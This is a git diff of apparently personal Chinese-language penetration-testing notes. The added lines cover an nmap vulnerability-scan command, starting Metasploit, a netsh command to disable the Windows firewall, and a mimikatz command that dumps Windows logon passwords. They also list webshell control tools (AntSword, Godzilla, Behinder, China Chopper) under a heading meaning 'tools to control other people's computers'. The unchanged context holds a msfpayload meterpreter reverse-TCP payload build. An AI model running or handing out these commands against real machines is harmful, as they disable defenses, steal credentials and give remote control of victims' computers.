--- a/安全/渗透.md
+++ b/安全/渗透.md
@@ -52,6 +52,12 @@ nmap -sS  -O 192.168.99.126
 
 -O 显示操作系统 每一种操作系统都有特定的指纹
 
+扫描目标主机是否有漏洞
+
+nmap --script=vuln  192.168.99.127
+
+
+
 #### nc( netcat) 进行端口扫描
 
 nc -z -v -n 192.168.78.128  1-100 
@@ -152,6 +158,42 @@ smb_enumshare
 msfpayload windows/meterpreter/reverse_tcp LHOST=5.5.5.1 LPORT=8080 R | \
   msfencode -b '' -t exe -o /var/www/meterpreter.exe
 ```
+
+#### metasploit 漏洞扫描工具
+
+文档
+
+https://www.kancloud.cn/wizardforcel/metasploit-manual/108071
+
+启动
+
+msfdb run
+
+关闭windows防火墙
+
+netsh firwall set opmode disable
+
+mimikatz.exe 破解win密码
+
+破解密码命令
+
+mimikatz.exe "privilege::debug" "sekurlsa::logonPasswords" "exit"
+
+
+
+## 控制别人电脑工具
+
+蚁剑  (php)
+
+下载地址
+
+https://github.com/AntSwordProject/AntSword-Loader
+
+哥斯拉（java）
+
+冰蝎 （）
+
+菜刀 （ASP）
 
 
 
